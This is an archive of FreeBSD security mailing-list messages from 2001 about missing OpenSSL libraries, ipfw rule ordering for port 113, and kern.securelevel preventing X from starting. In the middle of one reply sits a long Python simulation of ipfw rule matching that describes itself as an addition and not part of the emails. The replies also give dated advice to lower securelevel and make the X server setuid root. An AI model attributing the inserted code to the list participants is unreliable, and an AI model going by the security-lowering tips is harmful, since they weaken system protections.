> /usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a
> from ftp.openssl.org, and have attempted to re-install FreeBSD twice now
> over FTP.
> I have been installing: bin, manpages, compat4x, crypto, and
> local. Am I just missing the right distro? Or is the Release broken or
> something? Where are the ssl libraries? I am attempting to install/configure
> apache+ssl, (from the packages), this is what I get:

Sure you're installing the crypto distribution, not scrypto or whatever
the source collection is called? What mirror site are you using? Try
another one, maybe it doesn't carry the crypto collection and you're not
getting (or missing) the error.

Kris

From owner-freebsd-security Wed May 9 10:13:47 2001
From: Steve Peck
To: Nathan Vidican
Cc: security@FreeBSD.ORG
Date: Wed, 9 May 2001 18:08:52 +0100
Subject: Re: /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found
Message-ID: <20010509180852.D62940@pavilion.net>
In-Reply-To: <001801c0d8a6$a6d23a60$7053cad1@78lb019>

On Wed, May 09, 2001 at 12:39:43PM -0400, Nathan Vidican wrote:
> I have no *ssl* files in /usr/lib, /usr/libexec, /usr/local/lib, or
> /usr/local/libexec. I have manually compiled and installed OpenSSL 0.9.6a
> from ftp.openssl.org, and have attempted to re-install FreeBSD twice now
> over FTP. I have been installing: bin, manpages, compat4x, crypto, and
> local. Am I just missing the right distro? Or is the Release broken or
> something? Where are the ssl libraries? I am attempting to install/configure
> apache+ssl, (from the packages), this is what I get:
>
> mx2# httpsdctl configtest
> /usr/libexec/ld-elf.so.1: Shared object "libssl.so.2" not found
> mx2#
>
> I have sent a few messages back and forth now from questions@freebsd.org,
> but someone had suggested I send this question here. So here I am. If anyone
> has any ideas I'd be happy to hear them?
> I noticed that libssl.so.1 is supposed to be a symbolic link, (as
> dictated by various threads I found searching the mailing lists), but the
> file it would link to isn't even there?
>

I apologise now - this isn't going to answer your problem :(

I ftp installed FreeBSD4.3 over the weekend - I get ssh installed
automatically and the sshd daemon just gets started too. Just did a
standard installation - think I chose the basic users+X option.

bash-2.05$ ls -l /usr/lib/compat/libssl.so.1
-r--r--r--  1 root  wheel  174048 Apr 21 10:05 /usr/lib/compat/libssl.so.1
bash-2.05$ ls /usr/lib/*ssl*
/usr/lib/libssl.a       /usr/lib/libssl.so.2    /usr/lib/libssl.so      /usr/lib/libssl_p.a
bash-2.05$ ls -l /usr/libexec/ld-elf.so.1
-r-xr-xr-x  1 root  wheel  75472 Apr 21 10:08 /usr/libexec/ld-elf.so.1
bash-2.05$

and it seems to work OK. Hmm, didn't have any problem with 4.2 iirc.
I gotta ask, why did you manually compile and install OpenSSL 0.9.6a from
ftp.openssl.org? It's in the ports /usr/ports/security/openssh

bash-2.05$ less /usr/ports/security/openssh/pkg-descr
OpenSSH is a version of Secure Shell based upon a much less encumbered SSH
version 1.2.12, which has a BSD-style license. Maintained by the OpenBSD
project, this is the most free and secure SSH implementation in the world.
OpenSSH supports SSH protocol version 1.5 and has all known bugs from SSH
fixed, and even some unknown ones :)

Just a make install would be required!

I suggest getting the FreeBSD4.3 'kern' and 'mkfs' .flp files and another
install.

Sorry, couldn't help!

Cheers
Steve

From owner-freebsd-security Wed May 9 10:17:45 2001
From: Peter Pentchev
To: Kris Kennaway
Cc: Rasputin, Paul Herman, security@FreeBSD.ORG
Date: Wed, 9 May 2001 20:17:08 +0300
Subject: Re: setkey(3) not present in the system
Message-ID: <20010509201708.D497@ringworld.oblivion.bg>
In-Reply-To: <20010509093849.B40205@xor.obsecurity.org>
On Wed, May 09, 2001 at 09:38:50AM -0700, Kris Kennaway wrote:
> On Wed, May 09, 2001 at 02:34:55PM +0300, Peter Pentchev wrote:
> > > There's something nonstandard about the way it's linking which is
> > > triggering all of the __warn_references() in libc regardless of
> > > whether or not the code actually uses those "dangerous" functions -- I
> > > don't know what it is, but I've seen it a lot in ports. It's probably
> > > a bug which should be fixed.
> >
> > Nothing non-standard; the one about setkey() is triggered by just trying
> > to resolve setkey against libc's setkey symbol; similarly for the f_prealloc()
> > one. It's just that these warnings would never be triggered if the linker
> > saw these symbols in another library, and saw no need to touch these particular
> > object files within libc.
>
> Yes, I know you get the __warn_references() if you use a libc function
> which has a __warn_references() line -- what happens here is that you
> ALSO get *all* __warn_references() present in the entire library, even
> if you don't use *any* of those functions, if you do the Weird Linker
> Thing.

Oh, I thought you meant this specific case. In this case, the original
poster was referencing both f_prealloc() and setkey() in his program, so
the warnings should be expected.

G'luck,
Peter

--
I've heard that this sentence is a rumor.
From owner-freebsd-security Wed May 9 11:53:35 2001
From: Ian Smith
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Date: Thu, 10 May 2001 04:53:22 +1000 (EST)
Subject: Re: Ip filtering with ipfw
In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net>

On 9 May 2001, Michael Sharp wrote:
> I am very new to FreeBSD, and have some questions about ipfw
> I compiled: options IPFIREWALL
> into my kernel, and added: firewall_enable="YES" in /etc/rc.conf
> on reboot, I see ipfiltering initializing and the default policy is
> to deny. After reboot, I do: ipfw list and get this:
>
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 deny ip from 127.0.0.0/8 to any
> 65000 allow ip from any to any
> 65535 deny ip from any to any

This default policy is to allow (line 65000) except from/to 127.0.0.0/8

> I added to ipfw:
> ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10
> ipfw add deny all from any to 192.168.1.3 0-1023 in via x10
[..]
> However, all the OTHER DALnet servers are getting a response from 113
> ( not just 199.163.7.34 ) and when I ran nmap from a friend's box, it
> showed 113 open.
> What am I missing?
# ipfw delete 65000

But then, you want to check out example rules regarding denying spoofing
in and out, allowing established TCP but only allowing specific setups,
allowing UDP such as DNS, etc .. eg, not much use allowing 199.163.7.34 to
connect if the reply packets can't get back, and such ..

Cheers, Ian

From owner-freebsd-security Wed May 9 12:14:13 2001
From: Steve Peck
To: security@FreeBSD.ORG
Date: Wed, 9 May 2001 20:09:21 +0100
Subject: kernel security level
Message-ID: <20010509200921.A65710@pavilion.net>

Hi,

I've installed FreeBSD 4.3 and I got this strange problem where
kern.securelevel was set to 1. I had a version of 4.2 which just defaults
to -1. Is this something new?

Although it seems like a good idea, I had much trouble finding out why I
couldn't run X windows. Soon as I found a reference to this /dev/mem
suddenly was permitted and X started up - but only as root :-(.

I have since found that I can run X (as root) on kern.securelevel = 0
But if I set it to this via /etc/sysctl.conf it just gets upgraded to
level 1!
So, I now have it set to level -1 in /etc/sysctl.conf. If I did want to
run at level 0 then I would have to upgrade it manually by logging in as
root and doing

# sysctl -w kern.securelevel=0

every reboot :-(

Now, have I done something strangely bad during my install. I just ftp'd
it from the ftp.uk.FreeBSD.org site.

If I try to startx as a user then I now get

Fatal server error:
xf86OpeConsole:Server must be suid root

Hmmmm, anyone got any ideas?

Cheers
Steve

From owner-freebsd-security Wed May 9 13: 3:38 2001
From: Michael Sharp
To: FreeBSD-security@FreeBSD.org
Date: 9 May 2001 13:03:35 -0700
Subject: ipfw
Message-ID: <20010509200335.7680.cpmta@c000.sfo.cp.net>

expanding on what Noel Fitzpatrick said...

If I do ipfw -f flush I still have rule 65535 deny ip from any to any
which allows NOTHING in or OUT. I can add DENY chains all day, but I
cannot add any ALLOW chains unless I put in rule 65000 allow ip from any
to any but this goes at the very top and is the first chain processed
( which allows ANYTHING in ) even if there are DENY chains below it.
SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my
kernel and recompiled

In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open"

and still I cannot get rid of that pesky 65535 DENY everything rule that
won't let me do anything unless I add " ipfw add allow ip from any to any "
which allows everything despite ANY DENY chains.

From owner-freebsd-security Wed May 9 13:18:56 2001
From: Michael Sharp
To: FreeBSD-security@FreeBSD.org
Date: 9 May 2001 13:18:53 -0700
Subject: Re: ipfw
Message-ID: <20010509201853.6521.cpmta@c000.sfo.cp.net>

But I need to block port 113, and allow 1 machine to get to port 113.
HAVING to add ipfw add allow ip from any to any gets processed before I
would allow my 1 machine to port 113, thus allowing every machine to
port 113

On Wed, 09 May 2001, Ron Brogden wrote:
>
> On Wednesday 09 May 2001 20:03, you wrote:
> > and still I cannot get rid of that pesky 65535 DENY everything rule that
> > won't let me do anything unless I add " ipfw add allow ip from any to any "
> > which allows everything despite ANY DENY chains.
>
> Why can't you add the specific deny rules first if that is how you want
> things to work. Just give them a lower precedence than your blanket allow
> rule:
>
> ipfw add 40000 deny something from somewhere to somewhere_else
> ipfw add 50000 deny something from somewhere to somewhere_else
> ipfw add 60000 allow ip from any to any
>
> That said, shouldn't you be allowing specific stuff and then denying by
> default?
>
> Cheers,
>
> Ron
>

From owner-freebsd-security Wed May 9 13:45:43 2001
From: Nate Williams
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Date: Wed, 9 May 2001 14:45:26 -0600 (MDT)
Subject: Re: Ip filtering with ipfw
Message-ID: <15097.44134.876784.259823@nomad.yogotech.com>
In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net>

> After reboot, I do: ipfw list and
> get this:
>
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 deny ip from 127.0.0.0/8 to any
> 65000 allow ip from any to any
> 65535 deny ip from any to any
>
> which I am assuming is the defaults.

This is the default 'open' setup, yes, and happens because you added the
following (mentioned in another email).

> SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT to my
> kernel and recompiled.

Otherwise, rule 65000 wouldn't have existed.

> Now, to keep it simple, I have a router between my internal machine (
> 192.168.1.3 ) and the Internet and I set the router to allow only port
> 113 in to 192.168.1.3

Am I to assume the 'router' is the firewall box?

> ifconfig reveals that my ethernet card is on x10
>
> I added to ipfw:
>
> ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10
> ipfw add deny all from any to 192.168.1.3 0-1023 in via x10
>
> 199.163.7.34 is the ip of a DALnet IRC server that checks identd

So far so good.

> My thinking here was I only wanted 199.163.7.34 to get an identd
> response on 113 and block all the others from getting a response on
> 113.

If you're just worried about 113, then a rule like this may be more
effective.

ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 113 in via x10

This limits the IRC server to a single port. The second rule is adequate.

> However, all the OTHER DALnet servers are getting a response from
> 113 ( not just 199.163.7.34 ) and when I ran nmap from a friend's box,
> it showed 113 open.
>
> What am I missing?

What does an 'ipfw list' after you add the rules show?
Nate

From owner-freebsd-security Wed May 9 13:46:34 2001
From: "Crist Clark"
Organization: Globalstar LP
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Date: Wed, 09 May 2001 13:46:26 -0700
Subject: Re: ipfw
Message-ID: <3AF9ACA2.712EF7F3@globalstar.com>
References: <20010509200335.7680.cpmta@c000.sfo.cp.net>

Michael Sharp wrote:
>
> expanding on what Noel Fitzpatrick said...
>
> If I do ipfw -f flush I still have rule 65535 deny ip from any to any

The default rule. There is ALWAYS a rule 65535.

> which allows NOTHING in or OUT. I can add DENY chains all day, but I
> cannot add any ALLOW chains unless I put in rule 65000 allow ip from any
> to any but this goes at the very top and is the first chain processed
> ( which allows ANYTHING in ) even if there are DENY chains below it.

Uhhh... Hmmm? First, what are "chains?" Second, why can you not add pass
("allow") rules? What is preventing it?
> SO, from /etc/rc.firewall I added IPFIREWALL_DEFAULT_TO_ACCEPT
> to my kernel and recompiled
>
> In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open"
>
> and still I cannot get rid of that pesky 65535 DENY everything rule that
> won't let me do anything unless I add " ipfw add allow ip from any to any "
> which allows everything despite ANY DENY chains.

Still really confused here. Having default deny is generally a Good Thing
(tm) for a working firewall. Since you are specifying 'firewall_type="open"'
you should get a '65000 pass any to any' rule. Now, if you want to deny
specific traffic (the better way to generally go is explicitly allow what
you want and deny all else by default), you just have to add 'deny' rules
_before_ the '65000 pass any to any' rule.

I am wondering if that is the problem here? The rules are processed in
order, in a "match and out" manner. If you want a 'deny' rule to take
effect before your default '65000 pass' rule, you need to stick it in
_before_ rule 65000.

--
Crist J. Clark                          Network Security Engineer
crist.clark@globalstar.com              Globalstar, L.P.
(408) 933-4387                          FAX: (408) 933-4926
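The first-match ordering Crist explains here (and that Nate's and Ron's replies in this thread rely on), as an added Python model of ipfw rule evaluation that is not code from the thread or from ipfw itself: it parses the rule syntax used above, walks the rules in number order down to the fixed default rule 65535, and shows why the poster's unnumbered rules never fired against the 'open' ruleset while numbered rules or deleting 65000 do the job. Assumptions: an unnumbered `ipfw add` lands after the last non-default rule in steps of 100, the interface is xl0 (as in Jamie's reply), and 203.0.113.9 is a constructed stand-in for another DALnet server.

```python
# Added model of ipfw first-match evaluation; not code from the thread or ipfw.
# Assumed: an unnumbered 'ipfw add' goes after the last non-default rule (+100),
# the NIC is xl0, and 203.0.113.9 stands in for "some other DALnet server".
import ipaddress
from collections import namedtuple

DEFAULT_RULE = 65535  # always present; 'ipfw delete 65535' is refused
AUTOINC_STEP = 100    # assumed auto-numbering step for unnumbered adds

# Packet: proto "tcp"/"udp", direction "in"/"out", iface = NIC crossed.
# Rule: dports (lo, hi) or None; direction/via None means "either"/"any".
Packet = namedtuple("Packet", "proto src dst dport direction iface")
Rule = namedtuple("Rule", "number action proto src dst dports direction via")

def parse_rule(number, text):
    """Parse the ipfw subset used in the thread:
    action proto from src to dst [port[-port]] [in|out] [via ifname]"""
    tok = text.split()
    if len(tok) < 6 or tok[2] != "from" or tok[4] != "to":
        raise ValueError(f"cannot parse rule: {text!r}")
    action, proto, src, dst, rest = tok[0], tok[1], tok[3], tok[5], tok[6:]
    dports = direction = via = None
    while rest:
        t = rest.pop(0)
        if t in ("in", "out"):
            direction = t
        elif t == "via":
            via = rest.pop(0)
        elif t[0].isdigit():  # "113" or "0-1023", applied to the destination
            lo, _, hi = t.partition("-")
            dports = (int(lo), int(hi or lo))
        else:
            raise ValueError(f"unsupported token {t!r} in {text!r}")
    return Rule(number, action, proto, src, dst, dports, direction, via)

def _addr_match(spec, addr):
    return spec == "any" or ipaddress.ip_address(addr) in ipaddress.ip_network(spec, strict=False)

def rule_matches(r, p):
    return ((r.proto in ("ip", "all") or r.proto == p.proto)
            and _addr_match(r.src, p.src) and _addr_match(r.dst, p.dst)
            and (r.dports is None or r.dports[0] <= p.dport <= r.dports[1])
            and (r.direction is None or r.direction == p.direction)
            and (r.via is None or r.via == p.iface))

class Ruleset:
    def __init__(self, default_action="deny"):
        self.rules = {DEFAULT_RULE: parse_rule(DEFAULT_RULE, default_action + " ip from any to any")}

    def add(self, text, number=None):
        if number is None:  # assumed: last non-default rule + 100, capped at 65534
            last = max((n for n in self.rules if n != DEFAULT_RULE), default=0)
            number = min(last + AUTOINC_STEP, DEFAULT_RULE - 1)
        self.rules[number] = parse_rule(number, text)
        return number

    def delete(self, number):
        if number == DEFAULT_RULE:
            raise ValueError("rule 65535 is the default rule and cannot be deleted")
        del self.rules[number]

    def evaluate(self, p):
        # First matching rule wins; returns (rule number, action).
        for n in sorted(self.rules):
            if rule_matches(self.rules[n], p):
                return n, self.rules[n].action

def open_ruleset():
    """The firewall_type="open" list the original poster saw in 'ipfw list'."""
    rs = Ruleset("deny")
    rs.add("allow ip from any to any via lo0", 100)
    rs.add("deny ip from any to 127.0.0.0/8", 200)
    rs.add("deny ip from 127.0.0.0/8 to any", 300)
    rs.add("allow ip from any to any", 65000)
    return rs

# Constructed probes: the trusted DALnet server and some other host, each
# opening a TCP connection to identd (port 113) on the internal box.
TRUSTED = Packet("tcp", "199.163.7.34", "192.168.1.3", 113, "in", "xl0")
OTHER = Packet("tcp", "203.0.113.9", "192.168.1.3", 113, "in", "xl0")
ALLOW_IRC = "allow tcp from 199.163.7.34 to 192.168.1.3 113 in via xl0"
DENY_LOW = "deny all from any to 192.168.1.3 0-1023 in via xl0"

def as_posted():
    """Unnumbered adds land at 65100/65200, behind 65000: 113 stays open to all."""
    rs = open_ruleset()
    rs.add(ALLOW_IRC)
    rs.add(DENY_LOW)
    return rs.evaluate(TRUSTED), rs.evaluate(OTHER)

def numbered_before_65000():
    """Explicit numbers put the specific rules ahead of the blanket allow."""
    rs = open_ruleset()
    rs.add(ALLOW_IRC, 40000)
    rs.add(DENY_LOW, 50000)
    return rs.evaluate(TRUSTED), rs.evaluate(OTHER)

def default_deny():
    """Deleting 65000 leaves the fixed default rule 65535 to deny the rest."""
    rs = open_ruleset()
    rs.delete(65000)
    rs.add(ALLOW_IRC)
    return rs.evaluate(TRUSTED), rs.evaluate(OTHER)
```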
If you have received this e-mail in error, please contact
postmaster@globalstar.com

From owner-freebsd-security Wed May 9 13:49:28 2001
Delivered-To: freebsd-security@freebsd.org
Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id C69C737B423 for ; Wed, 9 May 2001 13:49:19 -0700 (PDT) (envelope-from nate@yogotech.com)
Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id OAA08327; Wed, 9 May 2001 14:49:19 -0600 (MDT) (envelope-from nate@nomad.yogotech.com)
Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id OAA17987; Wed, 9 May 2001 14:49:18 -0600 (MDT) (envelope-from nate)
From: Nate Williams
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <15097.44366.138725.618271@nomad.yogotech.com>
Date: Wed, 9 May 2001 14:49:18 -0600 (MDT)
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Subject: Re: ipfw
In-Reply-To: <20010509200335.7680.cpmta@c000.sfo.cp.net>
References: <20010509200335.7680.cpmta@c000.sfo.cp.net>
X-Mailer: VM 6.75 under 21.1 (patch 12) "Channel Islands" XEmacs Lucid
Reply-To: nate@yogotech.com (Nate Williams)
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

[ Try to wrap your lines at 80 chars. please ]

> If I do ipfw -f flush I still have rule 65535 deny ip from any to any

This is the default rule, and can't be removed.

> which allows NOTHING in or OUT. I can add DENY chains all day, but I
> cannot add any ALLOW chains unless I put in rule 65000 allow ip from
> any to any but this goes at the very top and is the first chain
> processed ( which allows ANYTHING in ) even if there are DENY chains
> below it.

Not true.
Rules are processed in order, and if you don't give a rule number I don't
know the order that a rule is inserted on the list. 'ipfw list' should show
you the process order though.

(BTW, what is this talk about 'ALLOW' and 'DENY' chains? I think you're
mixing up the FreeBSD implementation with the Linux 'chains' implementation.
FreeBSD's implementation is all rule based...)

> In /etc/rc.conf, I have firewall_enable="YES" and firewall_type="open"
> and still I cannot get rid of that pesky 65535 DENY everything rule
> that won't let me do anything unless I add " ipfw add allow ip from any
> to any " which allows everything despite ANY DENY chains.

If the 'allow/deny' *RULE* is processed before the other rule, then it will
take precedence. IPFW processes rules in order from start until it finds a
match, and then finishes. If a rule doesn't match, then the next rule will
be processed.

Nate

From owner-freebsd-security Wed May 9 14:59:16 2001
Delivered-To: freebsd-security@freebsd.org
Received: from nisser.com (c0039.upc-c.chello.nl [212.187.0.39]) by hub.freebsd.org (Postfix) with ESMTP id AE67C37B43C for ; Wed, 9 May 2001 14:59:08 -0700 (PDT) (envelope-from roelof@eboa.com)
Received: from eboa.com (roelof [10.0.0.2]) by nisser.com (8.9.3/8.9.2) with ESMTP id XAA61512; Wed, 9 May 2001 23:59:05 +0200 (CEST) (envelope-from roelof@eboa.com)
Message-ID: <3AF9BDA9.21F015A1@eboa.com>
Date: Wed, 09 May 2001 23:59:05 +0200
From: Roelof Osinga
Organization: eBOA - Programming the Web
X-Mailer: Mozilla 4.77 [en] (Windows NT 5.0; U)
X-Accept-Language: en,pdf
MIME-Version: 1.0
To: Steve Peck
Cc: security@FreeBSD.ORG
Subject: Re: kernel security level
References: <20010509200921.A65710@pavilion.net>
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Steve Peck wrote:
>
> Hi,
>
> I've installed the FreeBSD 4.3
>
> And I got this strange problem where the kern.securelevel was set to 1.
> ...

I'm currently upgrading the machines here (and there :) to 4.3 and:

test:/root/cvsup$ uname -a
FreeBSD test.nisser.com 4.3-STABLE FreeBSD 4.3-STABLE #0: Wed May 9 19:36:00 CEST 2001 toor@test.nisser.com:/usr/obj/usr/src/sys/NISSER-02 i386
test:/root/cvsup$ sysctl kern.securelevel
kern.securelevel: -1
test:/root/cvsup$

They don't seem to have that problem. Mind you, I did not go the GENERIC
route. Instead I went straight to my kernel configuration. Maybe that makes
a difference?

Roelof

--
_______________________________________________________________________
eBOA® est. 1982                                      http://eBOA.com/
tel. +31-58-2123014  mailto:info@eBOA.com?subject=Information_request
fax. +31-58-2160293

From owner-freebsd-security Wed May 9 15: 3:51 2001
Delivered-To: freebsd-security@freebsd.org
Received: from warp.belcom.net.ua (warp.belcom.net.ua [62.244.33.129]) by hub.freebsd.org (Postfix) with ESMTP id 5AC9637B422 for ; Wed, 9 May 2001 15:03:34 -0700 (PDT) (envelope-from say@belcom.net.ua)
Received: from warp.belcom.net.ua (say@warp.belcom.net.ua [62.244.33.129]) by warp.belcom.net.ua (8.11.3/8.11.3) with ESMTP id f49M2d408801; Thu, 10 May 2001 01:02:52 +0300 (EEST) (envelope-from say@belcom.net.ua)
Date: Thu, 10 May 2001 01:02:37 +0300 (EEST)
From: Alexander Suvorov
To: Michael Sharp
Cc: FreeBSD-security@FreeBSD.ORG
Subject: Re: Ip filtering with ipfw
In-Reply-To: <20010509160500.7232.cpmta@c000.sfo.cp.net>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On 9 May 2001, Michael Sharp wrote:

> I am very new to FreeBSD, and have some questions about ipfw
> I compiled: options IPFIREWALL
> into my kernel, and added: firewall_enable="YES" in /etc/rc.conf
> on reboot, I see ipfiltering initializing and the default policy is to
> deny. After reboot, I do: ipfw list and get this:
>
> 00100 allow ip from any to any via lo0
> 00200 deny ip from any to 127.0.0.0/8
> 00300 deny ip from 127.0.0.0/8 to any
> 65000 allow ip from any to any
> 65535 deny ip from any to any
>
> which I am assuming is the defaults. Now, to keep it simple, I have a
> router between my internal machine ( 192.168.1.3 ) and the Internet and
> I set the router to allow only port 113 in to 192.168.1.3
>
> ifconfig reveals that my ethernet card is on x10
>
> I added to ipfw:
>
> ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 in via x10
> ipfw add deny all from any to 192.168.1.3 0-1023 in via x10
>
> 199.163.7.34 is the ip of a DALnet IRC server that checks identd
> My thinking here was I only wanted 199.163.7.34 to get an identd
> response on 113 and block all the others from getting a response on 113.
> However, all the OTHER DALnet servers are getting a response from 113
> ( not just 199.163.7.34 ) and when I ran nmap from a friend's box, it
> showed 113 open.
>
> What am I missing?

First, if you want to pass only identd requests, you must specify a port in
the ipfw rule:

ipfw add allow tcp from 199.163.7.34 to 192.168.1.3 auth in via x10

Second, you can't use port-specific rules with the 'all' protocol field.
Instead use rules such as follows:

ipfw add deny tcp from any to 192.168.1.3 0-1023 in via x10
ipfw add deny udp from any to 192.168.1.3 0-1023 in via x10

--
Alexander Suvorov                           say@belcom.net.ua
Belcom ISP                                  Belaya Tserkov, Ukraine

From owner-freebsd-security Wed May 9 17:13:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from chalfont.mail.uk.easynet.net (chalfont.mail.uk.easynet.net [195.40.1.44]) by hub.freebsd.org (Postfix) with ESMTP id 1FA9437B423 for ; Wed, 9 May 2001 17:13:56 -0700 (PDT) (envelope-from steve@pavilion.net)
Received: from mushroom.systems.pavilion.net (mushroom.systems.pavilion.net [212.74.1.186]) by chalfont.mail.uk.easynet.net (Postfix) with ESMTP id 195C0F81D5; Thu, 10 May 2001 01:12:16 +0100 (BST)
Received: by mushroom.systems.pavilion.net (Postfix, from userid 1002) id A8AE213151; Thu, 10 May 2001 01:07:35 +0100 (BST)
Date: Thu, 10 May 2001 01:07:35 +0100
From: Steve Peck
To: Steve Peck
Cc: security@FreeBSD.ORG
Subject: Re: kernel security level
Message-ID: <20010510010735.C67755@pavilion.net>
References: <20010509200921.A65710@pavilion.net>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <20010509200921.A65710@pavilion.net>; from steve.peck@uk.easynet.net on Wed, May 09, 2001 at 08:09:21PM +0100
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

Hi,

OK, I've got it all working now :-)))

On Wed, May 09, 2001 at 08:09:21PM +0100, Steve Peck wrote:
> Hi,
>
> I've installed the FreeBSD 4.3
>
> And I got this strange problem where the kern.securelevel was set to 1.
>
> I had a version of 4.2 which just defaults to -1.
> it's set in /etc/rc.conf
> Is this something new?
> no
> Although it seems like a good idea, I had much trouble finding out why
> I couldn't run X windows.
> Soon as I found a reference to this /dev/mem
> suddenly was permitted and X started up - but only as root :-(.
>
> I have since found that I can run X (as root) on kern.securelevel = 0
> But if I set it to this via /etc/sysctl.conf it just gets upgraded to
> level 1! So, I now have it set to level -1 in /etc/sysctl.conf.
>
> If I did want to run at level 0 then I would have to upgrade it manually
> By logging in as root and doing
> # sysctl -w kern.securelevel=0
> every reboot :-(
> No - just set it in /etc/rc.conf ---see man init
> Now, have I done something strangely bad during my install.
> Yes - messed it all up in /stand/sysinstall
> I just ftp'd it from the ftp.uk.FreeBSD.org site.
>
> If I try to startx as a user then I now get
>
> Fatal server error:
> xf86OpenConsole:Server must be suid root
> The server (in /etc/X11R6/bin) has to be chmod +s

Thank you to the people who helped me.

Cheers

Steve

From owner-freebsd-security Wed May 9 17:19:21 2001
Delivered-To: freebsd-security@freebsd.org
Received: from puzo.uol.com.br (puzo.uol.com.br [200.231.206.183]) by hub.freebsd.org (Postfix) with ESMTP id 1DE8737B423 for ; Wed, 9 May 2001 17:19:16 -0700 (PDT) (envelope-from tirloni@din.uem.br)
Received: from 200191039106-dial-user-UOL.acessonet.com.br (200191039106-dial-user-UOL.acessonet.com.br [200.191.39.106]) by puzo.uol.com.br (8.9.1/8.9.1) with ESMTP id VAA14144; Wed, 9 May 2001 21:17:32 -0300 (BRT)
Date: Wed, 9 May 2001 06:53:24 -0300 (BRT)
From: Giovanni Picoli Tirloni
X-X-Sender:
To: Steve Peck
Cc:
Subject: Re: kernel security level
In-Reply-To: <20010509200921.A65710@pavilion.net>
Message-ID: <20010509064729.P517-100000@mink.ath.cx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Wed, 9 May 2001, Steve Peck wrote:

> Hi,
>
> I've installed the FreeBSD 4.3
>
> And I got this strange problem where the kern.securelevel was set to 1.
>
> I had a version of 4.2 which just defaults to -1.
>
> Is this something new?
>
> Although it seems like a good idea, I had much trouble finding out why
> I couldn't run X windows. Soon as I found a reference to this /dev/mem
> suddenly was permitted and X started up - but only as root :-(.
>
> I have since found that I can run X (as root) on kern.securelevel = 0
> But if I set it to this via /etc/sysctl.conf it just gets upgraded to
> level 1! So, I now have it set to level -1 in /etc/sysctl.conf.
>
> If I did want to run at level 0 then I would have to upgrade it manually
> By logging in as root and doing
> # sysctl -w kern.securelevel=0
> every reboot :-(
>
> Now, have I done something strangely bad during my install.
>
> I just ftp'd it from the ftp.uk.FreeBSD.org site.
>
> If I try to startx as a user then I now get
>
> Fatal server error:
> xf86OpenConsole:Server must be suid root
>
> Hmmmm, anyone got any ideas?

Check your /etc/rc.conf, there must be these lines there:

kern_securelevel_enable="YES"
kern_securelevel="1"

You don't need to change kern.securelevel yourself, the /etc/rc script does
it for you at boot time already. So take those lines out of your sysctl.conf
and just set the proper secure level in /etc/rc.conf or disable it
altogether.

You must have chosen the medium security profile (or whatever sets the
secure level to 1) while installing FreeBSD.
G'luck

--
Giovanni Picoli Tirloni
tirloni@din.uem.br

From owner-freebsd-security Thu May 10 2: 9:24 2001
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 8229237B423 for ; Thu, 10 May 2001 02:09:20 -0700 (PDT) (envelope-from des@ofug.org)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id LAA64594; Thu, 10 May 2001 11:09:07 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: "Retal"
Cc:
Subject: Re: Some Kernel options
References: <002601ba1df7$4da07940$b88f39d5@a>
From: Dag-Erling Smorgrav
Date: 10 May 2001 11:09:06 +0200
In-Reply-To: <002601ba1df7$4da07940$b88f39d5@a>
Message-ID:
Lines: 27
User-Agent: Gnus/5.0808 (Gnus v5.8.8) Emacs/20.7
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

"Retal" writes:
> options KBD_INSTALL_CDEV # install a CDEV entry in /dev

This option has no (visible) effect unless you use a USB keyboard.

> options TCP_DROP_SYNFIN #drop TCP packets with SYN+FIN

This option has no effect unless you set tcp_drop_synfin="YES" in
/etc/rc.conf.

> options TCP_RESTRICT_RST #restrict emission of TCP RST

Don't. Use blackhole(4) instead.

> options ICMP_BANDLIM

This option has an easily demonstrable effect: try running 'nmap -sS'
against your machine.

